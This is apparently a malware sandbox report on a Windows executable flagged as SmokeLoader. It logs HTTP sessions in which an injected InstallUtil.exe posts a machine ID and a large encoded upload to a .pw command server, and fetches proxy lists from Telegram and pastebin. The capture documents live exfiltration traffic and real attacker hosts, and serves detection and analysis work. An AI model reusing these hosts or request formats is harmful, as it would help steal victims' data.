                                                                                                                                                                    2024-01-07 04:30:04 UTC287OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 787
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:30:04 UTC787OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:30:04 UTC1335INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:04 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=qqh96v3r6kk3r14pfluojpd0al; expires=Wed, 01-May-2024 22:16:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:30:04 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:30:04 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:30:04 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p8f39N7x6HpKFpCs7Rsc95qE7uDtah17EE04p%2Bfd9Qqc5izW8e1jBnSbKP7dLh0L3iWRgbJK4JGqMjggT%2FSlFLmUSjLaJvS%2FeGPV762OaRnnk7hojiZirjM7F5F%2BolJfiiJAGLz8ISqe3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8419769d2e910cc9-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    2024-01-07 04:30:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 31 37 36 0d 0a
                                                                                                                                                                    Data Ascii: 11ok 191.96.227.176
                                                                                                                                                                    2024-01-07 04:30:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    18192.168.2.449772172.67.131.1144436032C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:30:05 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 564934
                                                                                                                                                                    Host: drownthinsaltroutese.pw
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 45 33 32 44 30 39 36 39 37 45 43 35 38 30 46 44 45 44 43 35 39 33 32 39 43 44 35 32 42 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 6d 4e 73 41 32 2d 2d 67 72 65 0d 0a
                                                                                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EE32D09697EC580FDEDC59329CD52B2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"AmNsA2--gre
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10 fc e8 47 b3 37 8f 8c 04 aa c4 af dd 3c 9a 87 a2 d6 47 47 3c 57 7f be d5 10 d2 86 db 54 27 2e 7c 48 d0 c4 3f 44 6d 15 8a 24 9d 61 60 c8 6e 1f 9f 3d b7 38 a9 7b 19 71 8e 6d 16 d5 69 e1 d5 cb 0e 4b 28 6e c6 38 29 2f 9e 7d ab 46 e1 e4 6d a6 d9 74 c3 a6 ae c5 87 5f d1 7c 64 50 32 64 8e 27 cb 87 47 c2 33 a8 e3 f7 1b 03 f8 b6 18 d8 0b 9a 5c e2 17 57 50 18 06 0f b7 6e 4b 90 af 40 64 ce a9 de ab ce a4 9e fd 51 b0 af f8 8c 30 83 89 6a 9e 5c 15
                                                                                                                                                                    Data Ascii: `P"M_R^\(z8oZ+Za*1!6Spl5sj\|H36:PG7<GG<WT'.|H?Dm$a`n=8{qmiK(n8)/}Fmt_|dP2d'G3\WPnK@dQ0j\
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d 48 be c0 68 58 38 c1 6e d4 cd 93 08 63 a6 d6 94 7d 28 0d c5 f8 68 f6 22 bc 6c 5e d8 f8 e1 da 81 0b 85 8f 46 0e 71 94 68 8a a3 23 91 5f dd b4 20 a5 c1 88 d9 f8 bc 78 4d 27 bf f5 d3 75 ad 4f 3e 87 96 12 3d 19 13 03 fe 51 19 c5 fc 0f 13 11 a4 b6 16 6e 86 1d c9 ad eb d6 c8 f8 81 91 c5 85 37 83 ec b0 d9 e3 70 e4 d5 df 27 90 51 75 f7 f3 fc 56 ec 6e d6 4b bb d0 f1 d0 9f b1 4e 25 cf 6f 55 f6 6d 6d 1c e1 8f b1 9e 6b 76 a8 da 97 17 5e 05 01 1d
                                                                                                                                                                    Data Ascii: vK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=HhX8nc}(h"l^Fqh#_ xM'uO>=Qn7p'QuVnKN%oUmmkv^
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f bb 67 78 fa 2d 7f aa 1e 74 7b f5 c1 56 8d 62 51 da 3c 56 ec a8 fd c9 7f 89 ed d5 e1 d7 f3 1d b4 84 3c 28 92 31 ab 49 0e 32 77 85 bd 90 0b 9a eb 35 ff 16 fa c7 13 2e 03 6a 57 ce 30 f7 47 7a bc ea 40 d0 42 14 ed bf b6 ed fb fc c5 9e fc 8a 74 f2 ce c2 7c cd c8 5f 5e 3f 59 51 ad ef 38 01 ec b1 47 25 84 d5 bf 6e 45 dc ff f2 c5 f6 75 bb 08 ff 17 ff 2c 82 79 f5 24 7a ea 66 f2 bf 08 43 d7 c4 81 87 9c cd cd df 17 34 b5 ef 8a 86 68 b0 cc 6d a5
                                                                                                                                                                    Data Ascii: }@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eOgx-t{VbQ<V<(1I2w5.jW0Gz@Bt|_^?YQ8G%nEu,y$zfC4hm
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2 2c 2b 41 10 f1 67 7b 3a 50 d1 7e 86 24 d6 1a a4 06 6e 45 69 53 0f 7d dc f7 90 f5 e0 26 e7 bc 0e a1 fd 4c f4 76 4c 03 55 91 c8 f7 1d 5c 2a e1 81 a5 8b fa e4 be 63 ec 26 11 7b ca b9 22 00 cd 81 b5 fa ed c6 13 38 45 14 37 44 3c 43 91 d8 bc 21 5f f0 cc 3f 02 e0 ed 42 c9 ac be e9 fc 56 e4 6b e3 84 1f 0e 8a d0 79 cd f4 5a 78 d9 4e 0f 85 a1 57 59 bd 93 66 d9 26 7d 3f 05 05 77 c7 7c 9e 3c 54 d1 89 51 8f 0c 8c 61 dd 7e 62 d5 26 01 95 9a 1b f2 02 b5 5f f8 b1 c1 8e 7b
                                                                                                                                                                    Data Ascii: 2xqZ#M$^p2ab'R$(K2oUd1yQ<#],+Ag{:P~$nEiS}&LvLU\*c&{"8E7D<C!_?BVkyZxNWYf&}?w|<TQa~b&_{
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53 53 9f d5 93 c7 84 c0 3e 3f aa 43 fa a7 98 e7 41 fe 55 8c 1c 21 e6 f8 7d 1e b0 b0 d3 ce 6e 6b df 45 a1 1b 89 2e 68 bd 50 04 b9 61 57 d4 3d 35 8d 1f 38 c5 b1 7e 47 75 d6 1d b4 e6 40 d0 47 74 83 32 e3 5c 43 8f e7 83 42 2b 25 63 b2 97 1e 85 c5 9c 74 e1 29 11 ba 8e 38 f7 f4 cb 95 41 5f b6 26 48 46 2a f1 97 d4 ec 0c 1f 8f 5b f4 cb ed f0 78 53 b1 5a 60 ff 9d 56 4d 09 1a 2e ea 14 a5 94 2b 6d 77 3f a9 94 fe ed dd 6c e3 c0 fc 72 d9 3f 61 87 f5 ed 43 3b a3 82 fd 57 ed
                                                                                                                                                                    Data Ascii: ~G#oMa[|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDSS>?CAU!}nkE.hPaW=58~Gu@Gt2\CB+%ct)8A_&HF*[xSZ`VM.+mw?lr?aC;W
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08 5c dd 18 2d f9 58 23 3d 5a a9 d4 b7 59 09 53 1f 03 10 5d 4a 7f c7 01 3c ca 3e 4a e7 3c 85 f2 ee 92 9f 19 7c 28 38 bf 1f e0 e2 e0 d8 9b e0 a3 75 4a 61 c9 fe 00 7f 50 52 71 a0 70 8e 06 c3 01 8f 91 9a d9 0b 37 49 e4 27 92 9e eb ac d3 9f e3 2a 9c 6e ae bb 4c b3 b4 93 35 00 23 f6 50 a7 9d 54 2a b7 2a 8b fd 64 22 41 1d a4 87 91 a8 e1 97 68 34 1b 74 38 04 a7 14 f9 b3 fb 3b 3f ba 04 8c d5 b9 dc a8 a3 16 db 05 a4 a1 c2 4a c4 38 2e 3b 37 d7 ce b9 57 4a 28 35 50 b3 b0
                                                                                                                                                                    Data Ascii: {oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F\-X#=ZYS]J<>J<|(8uJaPRqp7I'*nL5#PT**d"Ah4t8;?J8.;7WJ(5P
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf a7 24 e0 9a d7 d2 e6 97 44 3c a9 d6 54 2e fd e7 75 da 59 bd a1 66 da 1c 62 a9 00 e6 75 53 75 c7 07 ba 63 da d8 44 31 f7 36 e7 b4 73 7a dd 7b fa 83 75 9b 4f 00 b2 d7 ed c8 f9 91 7d e8 2a 13 f1 74 67 8f 45 2c c0 cc 3c d3 c9 59 df 1a 1e 87 8f 2e 74 10 a3 a2 7e 49 02 6b 10 53 04 70 5a 2d 17 6f e7 c1 8e 54 e1 39 ff 27 5f 6d 4f 7d b7 e8 b1 be 05 e8 53 86 89 2b 01 a6 5c 77 7c b5 4a 02 04 50 37 cc 51 cc 1b 21 0a 7c b4 54 e8 bc c8 d5 d9 f5 90 f5 13 cb f3 59 3c 0e e3
                                                                                                                                                                    Data Ascii: Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc($D<T.uYfbuSucD16sz{uO}*tgE,<Y.t~IkSpZ-oT9'_mO}S+\w|JP7Q!|TY<
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26 e5 91 f9 f9 66 b7 e8 51 61 82 c2 4c ed 65 61 be 6f d5 9f e5 19 da fc 74 2a db a5 8a c8 24 52 d2 9e 04 31 f1 ba e9 71 3c 3a 06 f2 f2 61 69 e5 c6 28 d3 48 98 0f 55 60 33 20 ab 5c 1d cb 59 32 72 9c f7 bf 90 b2 68 4d b8 e6 06 7d 9c ed 32 40 7f e0 01 87 c7 49 ae 75 41 69 79 23 46 2d 02 8f ce 85 65 1c 7e 0d 82 f9 36 c5 05 ce 77 a5 15 e3 71 d2 aa 9e db 05 0f b6 57 65 1c fd 72 9f 74 01 da 1d 58 22 16 bb 19 31 5f 02 73 7e cd b9 ff c2 a3 3b 8c df 6e 72 a1 07 56 bf 5a
                                                                                                                                                                    Data Ascii: [FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&fQaLeaot*$R1q<:ai(HU`3 \Y2rhM}2@IuAiy#F-e~6wqWertX"1_s~;nrVZ
                                                                                                                                                                    2024-01-07 04:30:05 UTC15331OUTData Raw: 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31 9d 37 ca 89 e1 de 52 cc 66 95 79 6f 57 c4 37 fd 56 a5 87 e2 39 0f ae f1 5b 00 76 2e 8a 10 bb a0 19 4d 03 34 23 9e 3b f4 9f dd f9 02 ab ea a0 c3 3d 0e eb 2a b8 a0 35 53 b7 85 5a 55 5a fa da ad e5 42 fc 55 1d 8b 77 55 50 06 f5 c1 cd ac 91 7e 93 27 fe f4 09 0b b7 f5 73 fe 24 15 06 75 fd 1d bf 76 fd 6d fe 46 c5 1a c5 8b b4 8a 04 b7 80 f8 2c ad 8c 17 55 e1 6d ad e5 68 df 5b 01 b4 e1 55 bb 26 1c 04 e2 e7 68 36 ff 29 65 6d 3e db f3 69 13 0f 7e 4a 64 cd d6 1d dc 73
                                                                                                                                                                    Data Ascii: ~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17RfyoW7V9[v.M4#;=*5SZUZBUwUP~'s$uvmF,Umh[U&h6)em>i~Jds
                                                                                                                                                                    2024-01-07 04:30:07 UTC1335INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:07 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=6mk9idqa7vpkjdrhjvt67c7o7k; expires=Wed, 01-May-2024 22:16:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Thu, 07-Mar-2024 04:30:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_use_round=1; expires=Thu, 07-Mar-2024 04:30:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_round_n=2; expires=Thu, 07-Mar-2024 04:30:07 GMT; Max-Age=5184000; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=idR8ZSgbnxu9a0%2B0r2xM2I1rYML2gKEMzrDZKlemJGWOykf2QjhW%2FFIpjbkrlejpLw3rEbuUqZ0ZeWuW1k1UMCD%2BOZDJqgDV1oaA5bOxAyTBZxIKX68FhJ4k61ImkJ4c9G%2FMgiieX2omDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 841976a66f69c445-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    19192.168.2.449787149.154.167.994435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:30:38 UTC65OUTGET /tor_proxies HTTP/1.1
                                                                                                                                                                    Host: t.me
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-01-07 04:30:38 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:38 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Content-Length: 10970
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: stel_ssid=c79d29405fd0157252_5987371226227394250; expires=Mon, 08 Jan 2024 04:30:38 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                    2024-01-07 04:30:38 UTC10970INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 74 6f 72 5f 70 72 6f 78 69 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70
                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @tor_proxies</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.p


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    20192.168.2.449794104.20.68.1434435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-01-07 04:30:38 UTC74OUTGET /raw/z2fzAVz5 HTTP/1.1
                                                                                                                                                                    Host: pastebin.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-01-07 04:30:39 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:39 GMT
                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-frame-options: DENY
                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                    x-xss-protection: 1;mode=block
                                                                                                                                                                    cache-control: public, max-age=1801
                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                    Last-Modified: Sun, 07 Jan 2024 04:30:39 GMT
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 84197774e9d4439f-EWR
                                                                                                                                                                    2024-01-07 04:30:39 UTC567INData Raw: 32 33 30 0d 0a 31 39 35 2e 36 36 2e 38 37 2e 31 30 35 3a 38 39 39 30 0d 0a 31 37 30 2e 37 35 2e 31 36 37 2e 32 34 32 3a 39 30 30 38 0d 0a 33 34 2e 32 34 35 2e 33 34 2e 31 31 39 3a 39 30 31 34 0d 0a 31 34 39 2e 32 30 32 2e 38 36 2e 32 32 32 3a 39 31 35 31 0d 0a 33 34 2e 32 34 35 2e 33 34 2e 31 31 39 3a 39 31 36 30 0d 0a 31 33 30 2e 31 38 35 2e 38 33 2e 37 36 3a 39 31 35 31 0d 0a 31 37 30 2e 37 35 2e 31 37 32 2e 35 30 3a 39 30 30 38 0d 0a 33 34 2e 32 34 35 2e 33 34 2e 31 31 39 3a 39 30 39 39 0d 0a 33 34 2e 32 34 35 2e 33 34 2e 31 31 39 3a 39 30 39 30 0d 0a 33 34 2e 32 34 35 2e 33 34 2e 31 31 39 3a 39 30 30 30 0d 0a 33 34 2e 32 34 35 2e 33 34 2e 31 31 39 3a 39 31 39 31 0d 0a 31 39 34 2e 35 38 2e 33 33 2e 32 33 3a 39 30 34 39 0d 0a 31 35 39 2e 36 35 2e 31 35
                                                                                                                                                                    Data Ascii: 230195.66.87.105:8990170.75.167.242:900834.245.34.119:9014149.202.86.222:915134.245.34.119:9160130.185.83.76:9151170.75.172.50:900834.245.34.119:909934.245.34.119:909034.245.34.119:900034.245.34.119:9191194.58.33.23:9049159.65.15
                                                                                                                                                                    2024-01-07 04:30:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:05:28:52
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\987123.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\987123.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:308'224 bytes
                                                                                                                                                                    MD5 hash:1B92D73AC6CA807ADC303C424EEEB80B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1708892086.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1708892086.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
